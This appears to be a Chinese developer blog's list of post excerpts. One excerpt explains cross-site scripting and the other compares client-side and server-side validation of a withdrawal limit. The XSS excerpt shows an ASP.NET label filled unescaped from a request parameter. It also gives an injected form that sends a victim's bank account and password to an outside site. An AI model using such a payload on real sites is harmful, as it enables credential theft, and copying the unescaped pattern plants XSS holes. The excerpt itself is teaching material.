工作中点滴记录

摘要： XSS又叫CSS (Cross Site Script) ，跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意攻击用户的特殊目的。源页面放一个标签，在后台Page_Load里面写this.textLabel.Text = Request["Msg"];构建攻击，让攻击后把数据传递到目标页构建代码如下：Msg=form action='http://www.shtarena.com' method='get'银行账号:input type='text' name='ID'/密码:input ty 阅读全文

摘要： 比如设置取款额度不能大于100元，客户端写法如下：asp:Button ID="txtSubmit" runat="server"OnClientClick="var test=document.getElementById('TextBox1').value;if(parseInt(test,10)100) alert('取款额度不能大于100'); else return;" Text="Button" onclick="Button1_Click" / 但是如果客户端浏览器禁用JavaScript，就没有效果；服务端验证如下：if (int.Parse(this.TextBox1. 阅读全文